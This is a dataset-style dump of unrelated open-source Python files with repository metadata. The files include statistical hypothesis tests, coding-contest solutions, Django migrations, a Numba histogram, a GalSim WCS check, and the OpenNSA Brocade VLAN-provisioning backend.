def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
test = QuantileEstimator(dict(estimate_method=self.options['estimate_method'],
quantile=self.options['quantile']))
dstar_arr = []
b = self.options['bootstrap_samples']
for _ in range(b):
sx = test.estimate_point(np.random.choice(sample1, len(sample1)))
sy = test.estimate_point(np.random.choice(sample2, len(sample2)))
dstar_arr.append(sx - sy)
dstar_arr = np.array(dstar_arr)
pstar = (sum(dstar_arr < 0) + 0.5 * sum(dstar_arr == 0)) / b
if self.options['alternative'] == 'less':
p = 1 - pstar
elif self.options['alternative'] == 'both':
p = 2 * min(pstar, 1 - pstar)
else: # greater
p = pstar
return p < alpha, pstar, p
@dataclass(frozen=True)
class ASDTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Almost Stochastic Dominance test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
tmp = sample2
sample2 = sample1
sample1 = tmp
phi = stats.norm.ppf(alpha)
epsilons = []
n = len(sample1)
m = len(sample2)
c = np.sqrt(n * m / (n + m))
eps_fn = lambda x, y: 1 - compute_pr_x_ge_y(x, y)
eps_orig = eps_fn(sample1, sample2)
for _ in range(1000):
bs1 = np.random.choice(sample1, n)
bs2 = np.random.choice(sample2, m)
epsilons.append(c * (eps_fn(bs1, bs2) - eps_orig))
min_eps = eps_orig - (1 / c) * np.std(epsilons) * phi
return min_eps < self.options.get('threshold', 0.5), min_eps, alpha
|
[
"r33tang@uwaterloo.ca"
] |
r33tang@uwaterloo.ca
|
2a1f653f3c6aa17decf8fe6281e94268b31d7d45
|
588f4991cad99f517ca5028e0e41c5b4d5252543
|
/contest/abc146/A.py
|
6dd0b6d5935a91706c75eddb86e2fa19ed8bb293
|
[
"MIT"
] |
permissive
|
mola1129/atcoder
|
3002ff38cabf0ccb5142bd576ed90419fccde02e
|
1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db
|
refs/heads/master
| 2020-06-16T12:24:49.609707
| 2020-03-14T15:58:42
| 2020-03-14T15:58:42
| 195,571,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
s = input()
week = ['SUN', 'MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT']
for i in range(7):
if s == week[i]:
print(7 - i)
break
|
[
"ms.mola1129@gmail.com"
] |
ms.mola1129@gmail.com
|
c66f88b67107e67c470860ea50ec688511ea496a
|
0010b3d8b8f806d6065e1bb1aa3c18f9714001a7
|
/tests/fits_files/check_pyast_sip.py
|
6bc939935357f3d53094597d1955dba3e9bf7d27
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-public-domain"
] |
permissive
|
GalSim-developers/GalSim
|
bfd2d5e57f20874ad81bc735195c5c62efad63eb
|
f1c0319600cc713373f1cea7459171fbf388848e
|
refs/heads/main
| 2023-08-17T07:30:44.583679
| 2023-08-15T02:52:00
| 2023-08-15T02:52:00
| 3,510,804
| 194
| 104
|
NOASSERTION
| 2023-09-12T04:03:38
| 2012-02-22T02:51:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,663
|
py
|
# Copyright (c) 2012-2022 by the GalSim developers team on GitHub
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
# https://github.com/GalSim-developers/GalSim
#
# GalSim is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
#
# This script is featured on pyast issue page:
# https://github.com/timj/starlink-pyast/issues/8
# PyAst had been failing to write SIP files correctly, but they fixed this in
# v3.9.0. We override their claim of success regardless, since they aren't
# necessarily accurate enough for our purposes (only accurate to 0.1 pixels).
# Thus, older PyAst versions work correctly in GalSim.
import starlink.Atl as Atl
import starlink.Ast as Ast
import astropy.io.fits as pyfits
import numpy
# http://fits.gsfc.nasa.gov/registry/sip/sipsample.fits
hdu = pyfits.open('sipsample.fits')[0]
fc = Ast.FitsChan(Atl.PyFITSAdapter(hdu))
wcs = fc.read()
# A random test position. The "true" RA, Dec values are taken from ds9.
x = 242
y = 75
true_ra = (13 + 30/60. + 1.474154/3600. - 24.) * numpy.pi / 12.
true_dec = (47 + 12/60. + 51.794474/3600.) * numpy.pi / 180.
ra1, dec1 = wcs.tran( numpy.array([ [x], [y] ]))
print 'Initial read of sipsample.fits:'
print 'error in ra = ',(ra1-true_ra) * 180.*3600./numpy.pi, 'arcsec'
print 'error in dec = ',(dec1-true_dec) * 180.*3600./numpy.pi, 'arcsec'
# Now cycle through writing and reading to a file
hdu2 = pyfits.PrimaryHDU()
fc2 = Ast.FitsChan(None, Atl.PyFITSAdapter(hdu2, clear=False), "Encoding=FITS-WCS")
success = fc2.write(wcs)
print 'success = ',success
if not success:
fc2 = Ast.FitsChan(None, Atl.PyFITSAdapter(hdu2, clear=False))
success = fc2.write(wcs)
print 'Native encoding: success = ',success
fc2.writefits()
hdu2.writeto('test_sip.fits', clobber=True)
hdu3 = pyfits.open('test_sip.fits')[0]
fc3 = Ast.FitsChan(Atl.PyFITSAdapter(hdu3))
wcs3 = fc3.read()
ra3, dec3 = wcs3.tran( numpy.array([ [x], [y] ]))
print 'After write/read round trip through fits file:'
print 'error in ra = ',(ra3-true_ra) * 180.*3600./numpy.pi, 'arcsec'
print 'error in dec = ',(dec3-true_dec) * 180.*3600./numpy.pi, 'arcsec'
|
[
"michael@jarvis.net"
] |
michael@jarvis.net
|
59c1f2b45d421f9c798635691acd2b8b721d41ce
|
359f3d8a1a2b5524490c314a44d60cec1d06f658
|
/whoweb/search/migrations/0016_remove_searchexportpage_limit.py
|
a6429e3520d3cf0c0d99c344ac8bb8c2cec16767
|
[] |
no_license
|
sivasuriyangithub/Merket_Intellect-s3.route
|
ec9d9aa7d4575d5ff8006e1454f69e4033193fc0
|
71a9ab642f9a31f4a318cebec7fe6a075870a83c
|
refs/heads/master
| 2023-08-25T13:51:02.116705
| 2021-10-19T01:06:49
| 2021-10-19T01:06:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 302
|
py
|
# Generated by Django 2.2.8 on 2020-02-10 02:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("search", "0015_auto_20200210_0233"),
]
operations = [
migrations.RemoveField(model_name="searchexportpage", name="limit",),
]
|
[
"zach@whoknows.com"
] |
zach@whoknows.com
|
9ab4170d522046aa76f5bf39f8cae94eaa54c710
|
dd87109f806b31ddd065b51162e4e3ddc167151f
|
/select_sqlalchemy.py
|
1ef7bac6df4eff93502b857a0cf97d7e3f2c2689
|
[] |
no_license
|
articuly/operation_practice
|
9776caeb9a039a72d008fc312b1134f7e2c18394
|
d4d4452e4174e6b8d7cc834f29452c08f304c719
|
refs/heads/master
| 2021-05-26T04:03:12.489849
| 2021-01-26T12:24:35
| 2021-01-26T12:24:35
| 254,045,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 958
|
py
|
from sqlalchemy import create_engine, Column, Integer, String, Enum
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
# 创建数据库引擎,连接mqsql数据库,用pymysql方式
engine = create_engine('mysql+pymysql://root:123456@localhost/mycms')
# 创建会话对象,根据不同的数据库引擎创建对应的会话对象
Session = sessionmaker(bind=engine)
# 创建会话对象实例
session = Session()
# base为映射基类
Base = declarative_base()
# 数据库表模型的映射
class Users(Base):
__tablename__ = 'users'
user_id = Column(Integer, primary_key=True)
username = Column(String(32))
realname = Column(String(32))
password = Column(String(32))
age = Column(Integer)
city = Column(String(32))
if __name__ == '__main__':
res = session.query(Users, Users.username, Users.realname).filter(Users.username.like("py%")).limit(50).all()
print(res)
|
[
"articuly@gmail.com"
] |
articuly@gmail.com
|
3fcd3ecb6a4ec8ef84a4547a9ff3b96cc2bc5142
|
88bd71afeb581578c9c0d29c08b38a9ed1c00ffb
|
/house/views.py
|
7e22d0ac99a0b75f5279554ee7e962e5af0bfc86
|
[] |
no_license
|
lopezjronald/DjangoRealEstateInvestmentProject
|
019b5c763a5839b920a9abf823c9feb1e9fde0f8
|
6347e2a60e48915333700c182bb4143166cfb8f1
|
refs/heads/master
| 2022-12-04T18:38:17.609092
| 2020-08-28T00:50:23
| 2020-08-28T00:50:23
| 290,914,869
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
from django.shortcuts import render
from .models import Project
def house(request):
projects = Project.objects.all()
return render(request, 'house/home.html', {'projects': projects})
|
[
"lopez.j.ronald@gmail.com"
] |
lopez.j.ronald@gmail.com
|
fa284df700e5a99c1ad7f73156e6a6cfb14a4ef6
|
c61802907bb274c999a6815a072336de977e65e9
|
/opennsa/backends/brocade.py
|
2e9860ec78d9b0f606ca23ee5b8ca96a718d3e9f
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
NORDUnet/opennsa
|
2f8039fa4702a8126e2e0cdc4bc6b56b4389c494
|
9d47b29037e5f9a159e7984eb17b4d3aeaf1708c
|
refs/heads/master
| 2023-07-22T22:36:44.864169
| 2022-10-06T13:18:08
| 2022-10-06T13:18:08
| 10,215,733
| 16
| 24
|
BSD-3-Clause
| 2022-10-06T13:08:44
| 2013-05-22T08:50:54
|
Python
|
UTF-8
|
Python
| false
| false
| 8,035
|
py
|
"""
Brocade backend.
Contributed by Balasubramania Pillai from MAX Gigapop.
Ported to OpenNSA NSIv2 by Henrik Thostrup Jensen (summer 2013)
Further contributions/fixes from Jeronimo Aguiar from AMPATH.
Further contributions by John Hess from CENIC.
Notes:
configure terminal
vlan $vlan_id name $name
tagged $source_port
tagged $dest_port
end
Teardown:
configure terminal
no vlan $vlan_id
end
"""
import string
import random
from twisted.python import log
from twisted.internet import defer
from opennsa import constants as cnt, config
from opennsa.backends.common import ssh, genericbackend
LOG_SYSTEM = 'opennsa.brocade'
COMMAND_PRIVILEGE = 'enable %s'
COMMAND_CONFIGURE = 'configure terminal'
COMMAND_END = 'end'
COMMAND_VLAN = 'vlan %(vlan)i name %(name)s'
#COMMAND_TAGGED = 'tagged %(port)s'
COMMAND_TAGGED = 'tagged ethernet %(port)s'
COMMAND_NO_VLAN = 'no vlan %(vlan)i'
def _portToInterfaceVLAN(nrm_port):
port, vlan = nrm_port.split('.')
vlan = int(vlan)
return port, vlan
def _createSetupCommands(source_nrm_port, dest_nrm_port):
log.msg('_createSetupCommands: src %s dst %s' % (source_nrm_port, dest_nrm_port))
s_port, s_vlan = _portToInterfaceVLAN(source_nrm_port)
d_port, d_vlan = _portToInterfaceVLAN(dest_nrm_port)
assert s_vlan == d_vlan, 'Source and destination VLANs differ, unpossible!'
log.msg('_createSetupCommands: src %s %s dst %s %s' % (s_port, s_vlan, d_port, d_vlan))
name = 'opennsa-%i' % s_vlan
cmd_vlan = COMMAND_VLAN % { 'vlan' : s_vlan, 'name' : name }
cmd_s_intf = COMMAND_TAGGED % { 'port' : s_port }
cmd_d_intf = COMMAND_TAGGED % { 'port' : d_port }
commands = [ cmd_vlan, cmd_s_intf, cmd_d_intf ]
log.msg('_createSetupCommands: commands %s' % (commands))
return commands
def _createTeardownCommands(source_nrm_port, dest_nrm_port):
s_port, s_vlan = _portToInterfaceVLAN(source_nrm_port)
d_port, d_vlan = _portToInterfaceVLAN(dest_nrm_port)
assert s_vlan == d_vlan, 'Source and destination VLANs differ, unpossible!'
cmd_no_intf = COMMAND_NO_VLAN % { 'vlan' : s_vlan }
commands = [ cmd_no_intf ]
return commands
class SSHChannel(ssh.SSHChannel):
name = b'session'
def __init__(self, conn):
ssh.SSHChannel.__init__(self, conn=conn)
self.data = b''
self.wait_defer = None
self.wait_data = None
@defer.inlineCallbacks
def sendCommands(self, commands, enable_password):
LT = '\r' # line termination
try:
log.msg('Requesting shell for sending commands', debug=True, system=LOG_SYSTEM)
yield self.conn.sendRequest(self, 'shell', b'', wantReply=1)
d = self.waitForData(b'>')
self.write(COMMAND_PRIVILEGE % enable_password + LT)
yield d
log.msg('Entered privileged mode', debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(COMMAND_CONFIGURE + LT)
yield d
log.msg('Entered configure mode', debug=True, system=LOG_SYSTEM)
for cmd in commands:
log.msg('CMD> %s' % cmd, debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(cmd + LT)
yield d
# not quite sure how to handle failure here
log.msg('Commands send, sending end command.', debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(COMMAND_END + LT)
yield d
except Exception as e:
log.msg('Error sending commands: %s' % str(e))
raise e
log.msg('Commands successfully send', debug=True, system=LOG_SYSTEM)
self.sendEOF()
self.closeIt()
def waitForData(self, data):
self.wait_data = data
self.wait_defer = defer.Deferred()
return self.wait_defer
def dataReceived(self, data):
if len(data) == 0:
pass
else:
self.data += data
if self.wait_data and self.wait_data in self.data:
d = self.wait_defer
self.data = b''
self.wait_data = None
self.wait_defer = None
d.callback(self)
class BrocadeCommandSender:
def __init__(self, host, port, ssh_host_fingerprint, user, ssh_public_key_path, ssh_private_key_path, enable_password):
self.ssh_connection_creator = \
ssh.SSHConnectionCreator(host, port, [ ssh_host_fingerprint ], user, ssh_public_key_path, ssh_private_key_path)
self.enable_password = enable_password
@defer.inlineCallbacks
def sendCommands(self, commands):
# Open a connection for each request
# This is done due to the code being based on the Force10 backend
# It is currently unknown if the Brocade SSH implementation
# supports multiple ssh channels.
log.msg('Creating new SSH connection', debug=True, system=LOG_SYSTEM)
ssh_connection = yield self.ssh_connection_creator.getSSHConnection()
try:
channel = SSHChannel(conn=ssh_connection)
ssh_connection.openChannel(channel)
yield channel.channel_open
yield channel.sendCommands(commands, self.enable_password)
finally:
ssh_connection.transport.loseConnection()
class BrocadeConnectionManager:
def __init__(self, log_system, port_map, cfg):
self.log_system = log_system
self.port_map = port_map
host = cfg[config.BROCADE_HOST]
port = cfg.get(config.BROCADE_PORT, 22)
host_fingerprint = cfg[config.BROCADE_HOST_FINGERPRINT]
user = cfg[config.BROCADE_USER]
ssh_public_key = cfg[config.BROCADE_SSH_PUBLIC_KEY]
ssh_private_key = cfg[config.BROCADE_SSH_PRIVATE_KEY]
enable_password = cfg[config.BROCADE_ENABLE_PASSWORD]
self.command_sender = BrocadeCommandSender(host, port, host_fingerprint, user, ssh_public_key, ssh_private_key, enable_password)
def getResource(self, port, label):
assert label is not None and label.type_ == cnt.ETHERNET_VLAN, 'Label type must be ethernet-vlan'
return str(label.labelValue())
def getTarget(self, port, label):
assert label is not None and label.type_ == cnt.ETHERNET_VLAN, 'Label type must be ethernet-vlan'
return self.port_map[port] + '.' + label.labelValue()
def createConnectionId(self, source_target, dest_target):
return 'B-' + ''.join( [ random.choice(string.hexdigits[:16]) for _ in range(10) ] )
def canSwapLabel(self, label_type):
return False
def setupLink(self, connection_id, source_target, dest_target, bandwidth):
def linkUp(pt):
log.msg('Link %s -> %s up' % (source_target, dest_target), system=self.log_system)
return pt
commands = _createSetupCommands(source_target, dest_target)
d = self.command_sender.sendCommands(commands)
d.addCallback(linkUp)
return d
def teardownLink(self, connection_id, source_target, dest_target, bandwidth):
def linkDown(pt):
log.msg('Link %s -> %s down' % (source_target, dest_target), system=self.log_system)
return pt
commands = _createTeardownCommands(source_target, dest_target)
d = self.command_sender.sendCommands(commands)
d.addCallback(linkDown)
return d
def BrocadeBackend(network_name, nrm_ports, parent_requester, configuration):
name = 'Brocade %s' % network_name
nrm_map = dict( [ (p.name, p) for p in nrm_ports ] ) # for the generic backend
port_map = dict( [ (p.name, p.interface) for p in nrm_ports ] ) # for the nrm backend
cm = BrocadeConnectionManager(name, port_map, configuration)
return genericbackend.GenericBackend(network_name, nrm_map, cm, parent_requester, name)
|
[
"htj@nordu.net"
] |
htj@nordu.net
|
fdd4638884d947455012f888f979014d61edaff5
|
8e328e186da6c5bb12c35c72a967ab73be97d6c5
|
/CSMWeb/models.py
|
50a3d4cb6e83c4946df1b2340bafec3794e70140
|
[] |
no_license
|
PaloAltoCSM/CSM
|
48bef57a7db0e623deec60d66e3e5dc4470354e9
|
dd4aaeada040df8e199e9efcea779bef45bbbdb1
|
refs/heads/master
| 2021-01-01T16:30:04.794114
| 2015-08-15T01:46:29
| 2015-08-15T01:46:29
| 40,500,511
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 831
|
py
|
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
class Tag(models.Model):
text = models.CharField(max_length=100, primary_key=True)
def __str__(self):
return "Tag #%s" % (self.text)
class Project(models.Model):
name = models.CharField(max_length=100, primary_key=True)
title = models.CharField(max_length=200, blank=True)
description = models.TextField(blank=True)
members = models.ManyToManyField(User, related_name='projmembers')
followers = models.ManyToManyField(User, related_name='projfollowers')
# tags
tags = models.ManyToManyField(Tag)
def getDict(self):
return {'id': self.id, 'title': self.title, 'description': self.description}
def __unicode__(self):
return "Project #%s" % (self.name)
|
[
"donkimber@gmail.com"
] |
donkimber@gmail.com
|
5a7783237e226747e5fbd25cac84df4b45ef3159
|
4a74875c7366a19b7189fcb89fa0fa27abc4309e
|
/data_pipeline/processor/processor.py
|
b6493e1c2048911a74ea00ba33661a7c5fd2dae6
|
[
"Apache-2.0"
] |
permissive
|
saubury-iag/data_pipeline
|
d865d66d25eeb4ea6c6a655ae934bfe83c0efa06
|
4ad04198ed48c643045113c6e2c3e0848adbdec6
|
refs/heads/master
| 2021-07-23T08:43:46.754162
| 2017-11-01T05:05:23
| 2017-11-01T05:05:23
| 108,808,749
| 0
| 0
| null | 2017-10-30T06:06:41
| 2017-10-30T06:06:41
| null |
UTF-8
|
Python
| false
| false
| 1,726
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
###############################################################################
# Module: cdc_processor
# Purpose: Processes CDCs polled from Kafka queue
#
# Notes:
#
###############################################################################
import logging
from abc import ABCMeta, abstractmethod
class Processor(object):
__metaclass__ = ABCMeta
def __init__(self):
self._set_logger()
def _set_logger(self):
self._logger = logging.getLogger(__name__)
def renew_workdirectory(self):
self._set_logger()
@abstractmethod
def deserialise(self):
pass
@abstractmethod
def process(self, stream_message):
"""Process CDC messsage into a statement
:param dict stream_message: Stream message payload polled from queue
:return: Statement object representing the statement to apply to target
:rtype: Statement
"""
pass
|
[
"simon.aubury@iag.com.au"
] |
simon.aubury@iag.com.au
|
244537803eabece33bf150b7a3e93cf37db117cb
|
b0eef0efd10556a4b054574fdd2d43124cb0856b
|
/npbench/benchmarks/azimint_hist/azimint_hist_numba_np.py
|
a59941dc12823543eda3a331f4260532d55b9226
|
[
"BSD-3-Clause"
] |
permissive
|
learning-chip/npbench
|
140d38be2095b54393de6e0008264b54b7cf686b
|
f2f545afe3603d5c8f1771f26d660f25ce4a3cda
|
refs/heads/main
| 2023-05-10T09:54:52.719759
| 2021-05-31T12:09:48
| 2021-05-31T12:09:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,291
|
py
|
# Copyright 2014 Jérôme Kieffer et al.
# This is an open-access article distributed under the terms of the
# Creative Commons Attribution License, which permits unrestricted use,
# distribution, and reproduction in any medium, provided the original author
# and source are credited.
# http://creativecommons.org/licenses/by/3.0/
# Jérôme Kieffer and Giannis Ashiotis. Pyfai: a python library for
# high performance azimuthal integration on gpu, 2014. In Proceedings of the
# 7th European Conference on Python in Science (EuroSciPy 2014).
# BSD 2-Clause License
# Copyright (c) 2017, Numba
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import numba as nb
@nb.jit(nopython=True, parallel=True, fastmath=True)
def get_bin_edges_parallel(a, bins):
bin_edges = np.zeros((bins + 1, ), dtype=np.float64)
a_min = a.min()
a_max = a.max()
delta = (a_max - a_min) / bins
for i in range(bin_edges.shape[0]):
bin_edges[i] = a_min + i * delta
bin_edges[-1] = a_max # Avoid roundoff error on last point
return bin_edges
@nb.jit(nopython=True, fastmath=True)
def compute_bin(x, bin_edges):
# assuming uniform bins for now
n = bin_edges.shape[0] - 1
a_min = bin_edges[0]
a_max = bin_edges[-1]
# special case to mirror NumPy behavior for last bin
if x == a_max:
return n - 1 # a_max always in last bin
return int(n * (x - a_min) / (a_max - a_min))
@nb.jit(nopython=True, parallel=True, fastmath=True)
def histogram_parallel(a, bins, weights):
hist = np.zeros((bins, ), dtype=a.dtype)
bin_edges = get_bin_edges_parallel(a, bins)
for i in range(a.shape[0]):
bin = compute_bin(a[i], bin_edges)
hist[bin] += weights[i]
return hist, bin_edges
@nb.jit(nopython=True, parallel=True, fastmath=True)
def azimint_hist(data, radius, npt):
histu = np.histogram(radius, npt)[0]
# histw = np.histogram(radius, npt, weights=data)[0]
histw = histogram_parallel(radius, npt, weights=data)[0]
return histw / histu
|
[
"alexandros.ziogas@inf.ethz.ch"
] |
alexandros.ziogas@inf.ethz.ch
|
b07b16db3d774aac0bbdc84ffbfe276598532c9b
|
fc353b0433348ff58841cf32bf1f5e594e037513
|
/leetcode/414.Third Maximum Number.py
|
ca03468944b1979e12857f95f61398921bb8c3d2
|
[] |
no_license
|
TrellixVulnTeam/Demo_933I
|
ce759ec52dd191f99b998862f4aba7971878ba37
|
ab662060eb07a88a48c9832e09bf268517c1a3fa
|
refs/heads/master
| 2023-04-27T16:55:29.627491
| 2021-05-07T05:38:58
| 2021-05-07T05:38:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,215
|
py
|
# Given a non-empty array of integers, return the third maximum number in this a
# rray. If it does not exist, return the maximum number. The time complexity must
# be in O(n).
#
# Example 1:
#
# Input: [3, 2, 1]
#
# Output: 1
#
# Explanation: The third maximum is 1.
#
#
#
# Example 2:
#
# Input: [1, 2]
#
# Output: 2
#
# Explanation: The third maximum does not exist, so the maximum (2) is returned
# instead.
#
#
#
# Example 3:
#
# Input: [2, 2, 3, 1]
#
# Output: 1
#
# Explanation: Note that the third maximum here means the third maximum distinct
# number.
# Both numbers with value 2 are both considered as second maximum.
#
# Related Topics Array
# 👍 836 👎 1515
# region time
# 2020-12-30 23:36:42
# endregion
# leetcode submit region begin(Prohibit modification and deletion)
class Solution:
def thirdMax(self, nums) -> int:
nums = list(set(nums))
if len(nums) < 3:
return max(nums)
nums.sort(reverse=True)
return nums[2]
# leetcode submit region end(Prohibit modification and deletion)
if __name__ == '__main__':
# n = [3, 2, 1]
# n = [2, 2, 3, 1]
n = [1, 1, 2]
print(Solution().thirdMax(n))
|
[
"1149061045@qq.com"
] |
1149061045@qq.com
|
7516852dd574508330178cbc13a9ed763a228644
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/MtktG9Dz7z9vBCFYM_1.py
|
b19055d28322e4de6c3ee44a3d7684ed9c0daf4d
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 472
|
py
|
"""
Write a function that takes an IP address and returns the domain name using
PTR DNS records.
### Example
get_domain("8.8.8.8") ➞ "dns.google"
get_domain("8.8.4.4") ➞ "dns.google"
### Notes
* You may want to import `socket`.
* Don't cheat and just print the domain name, you need to make a real DNS request.
* Return as a string.
"""
import socket as sk
def get_domain(ip_address):
return sk.getfqdn(sk.gethostbyaddr(ip_address)[0])
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
95e1625f25d743050cb651088f93e69da0459865
|
e0d404675839dc10bc1e995be4c35a69ab9133a5
|
/api_client/python/grr_api_client/config.py
|
18fe1aba06e22f8e98221caa6d7e3312da7a36a9
|
[
"Apache-2.0"
] |
permissive
|
feitianyiren/grr
|
4afebc4a1912d46b4df4f1b4b0d25500505d05e5
|
9cc014f44ea9b21166e3b6815eb218d39f37fa07
|
refs/heads/master
| 2020-04-09T02:53:22.199635
| 2018-11-28T10:54:52
| 2018-11-28T10:54:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,804
|
py
|
#!/usr/bin/env python
"""Functions and objects to access config-related GRR API methods."""
from __future__ import absolute_import
from __future__ import unicode_literals
from grr_api_client import utils
from grr_response_proto.api import config_pb2
class GrrBinaryBase(object):
"""Base class for GrrBinary references and objects."""
def __init__(self, binary_type=None, path=None, context=None):
super(GrrBinaryBase, self).__init__()
if not binary_type:
raise ValueError("binary_type can't be empty")
if not path:
raise ValueError("path can't be empty")
if not context:
raise ValueError("context can't be empty")
self.binary_type = binary_type
self.path = path
self._context = context
def Get(self):
args = config_pb2.ApiGetGrrBinaryArgs(type=self.binary_type, path=self.path)
data = self._context.SendRequest("GetGrrBinary", args)
return GrrBinary(data=data, context=self._context)
def GetBlob(self):
args = config_pb2.ApiGetGrrBinaryBlobArgs(
type=self.binary_type, path=self.path)
return self._context.SendStreamingRequest("GetGrrBinaryBlob", args)
class GrrBinaryRef(GrrBinaryBase):
"""GRR binary reference (points to one, but has no data)."""
class GrrBinary(GrrBinaryBase):
"""GRR binary object with fetched data."""
def __init__(self, data=None, context=None):
if data is None:
raise ValueError("data can't be None")
super(GrrBinary, self).__init__(
binary_type=data.type, path=data.path, context=context)
self.data = data
def ListGrrBinaries(context=None):
"""Lists all registered Grr binaries."""
items = context.SendIteratorRequest("ListGrrBinaries", None)
return utils.MapItemsIterator(
lambda data: GrrBinary(data=data, context=context), items)
|
[
"realbushman@gmail.com"
] |
realbushman@gmail.com
|
384f2c32d83751bbaee4e8bf82c84cbdb8560799
|
db1592ee9ba472d2a2f94056ac32b255deb69ecd
|
/hog/api/migrations/0007_auto_20190618_1648.py
|
03bfdfd56703771d235c0fe8b69f4fc89eb337bf
|
[] |
no_license
|
tech4nature/hogapp
|
3fadcad8353dd2cecdc97eff87d0f196e144a2f5
|
24d50c9756853534e1dafdccbf3609fd512f253a
|
refs/heads/main
| 2023-03-07T00:45:53.100651
| 2022-07-09T13:00:16
| 2022-07-09T13:00:16
| 175,845,744
| 1
| 0
| null | 2023-02-15T19:58:09
| 2019-03-15T15:27:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,182
|
py
|
# Generated by Django 2.1.7 on 2019-06-18 16:48
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('api', '0006_location_coords'),
]
operations = [
migrations.AddField(
model_name='measurement',
name='video_poster',
field=models.FileField(blank=True, null=True, upload_to='posters'),
),
migrations.AlterField(
model_name='hog',
name='code',
field=models.CharField(max_length=80, primary_key=True, serialize=False, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), "Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens.", 'invalid')]),
),
migrations.AlterField(
model_name='location',
name='code',
field=models.CharField(max_length=80, primary_key=True, serialize=False, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), "Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens.", 'invalid')]),
),
]
|
[
"seb.bacon@gmail.com"
] |
seb.bacon@gmail.com
|
ed2d8e730e1f68799c443568132b6b04df8ed6f2
|
9f884a3584eef771f8c010e296c5d763098be243
|
/povary/apps/recipes/urls.py
|
8e69a1a748b52fe7ca90910cd8edfb48e5a05e85
|
[
"BSD-3-Clause"
] |
permissive
|
TorinAsakura/cooking
|
fc8658ce2ac21c2e00dc307399a5fa24971a20c1
|
cf0c78f613fa9ce0fcd4ec7a397ab880d9dd631a
|
refs/heads/master
| 2023-01-24T13:07:38.529811
| 2020-12-08T22:14:33
| 2020-12-08T22:14:33
| 319,773,012
| 0
| 0
|
BSD-3-Clause
